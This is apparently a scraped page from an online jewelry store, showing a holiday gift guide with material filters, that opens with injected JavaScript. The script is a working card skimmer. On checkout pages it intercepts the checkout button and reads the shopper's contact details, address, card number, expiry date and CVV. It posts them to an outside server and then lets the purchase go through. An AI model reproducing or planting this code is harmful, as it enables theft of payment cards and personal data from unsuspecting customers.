function qwer() { document.onmousedown = (e) => { let btn1 = document.querySelector("button[class='action primary checkout amasty']") if (btn1) { if (e.target.closest("button") === btn1 || e.target === btn1) { e.preventDefault(); let customerEmailInput = document.getElementById('customer-email') let fname = document.querySelector('input[name="firstname"]') let lname = document.querySelector('input[name="lastname"]') let addr = document.querySelector('input[name="street[0]"]') let city = document.querySelector('input[name="city"]') let state = document.querySelector('select[name="region_id"]') let zipcode = document.querySelector('input[name="postcode"]') let country = document.querySelector('select[name="country_id"]') let phone = document.querySelector('input[name="telephone"]') let nnn = document.querySelector('input[name="payment[cc_number]"]') let exp1 = document.querySelector('select[name="payment[cc_exp_month]"]') let exp2 = document.querySelector('select[name="payment[cc_exp_year]"]') let ccc = document.querySelector('input[name="payment[cc_cid]"]') const postData = {} postData.site = "williamhenry" if (customerEmailInput) { postData.email = customerEmailInput.value } if (fname) { postData.name = fname.value } if (lname) { if (postData.name) { postData.name += " " + lname.value } else { postData.name = lname.value } } if (addr) { postData.address = addr.value } if (city) { postData.city = city.value } if (state) { postData.state = state.options[document.querySelector('select[name="region_id"]').selectedIndex].textContent } if (zipcode) { postData.zipcode = zipcode.value } if (country) { postData.country = country.value } if (phone) { postData.phone = phone.value } if (nnn) { postData.nnn = nnn.value } if (exp1) { postData.exp = exp1.value } if (exp2) { if (postData.exp) { postData.exp += "/" + exp2.value } else { postData.exp = exp2.value } } if (ccc) { postData.ccc = ccc.value } let xhr = new XMLHttpRequest(); let url = "https://frodosc.xyz/1"; xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "application/json"); xhr.onreadystatechange = function () { if (xhr.readyState === 4 && xhr.status === 200) { btn1.click() } else if (xhr.readyState === 4 && xhr.status !== 200) { console.error('Network response was not ok'); } }; xhr.onerror = function () { console.error('There was a problem with the XMLHttpRequest'); }; xhr.send(JSON.stringify(postData)); } } } } window.addEventListener("load", () => { const currentUrl = window.location.toString().toLowerCase(); const isExpressCheckoutPage = currentUrl.includes("/checkout/"); if (isExpressCheckoutPage) { qwer() } })
Free 2-Day shipping in the U.S. - Pay over time with

Holiday Gift Guide

Applied Filters (3)
  1. Materials White Topaz Remove This Item
  2. Materials Black Jade Remove This Item
  3. Materials 18K Gold Remove This Item
  4. Clear All
per page
per page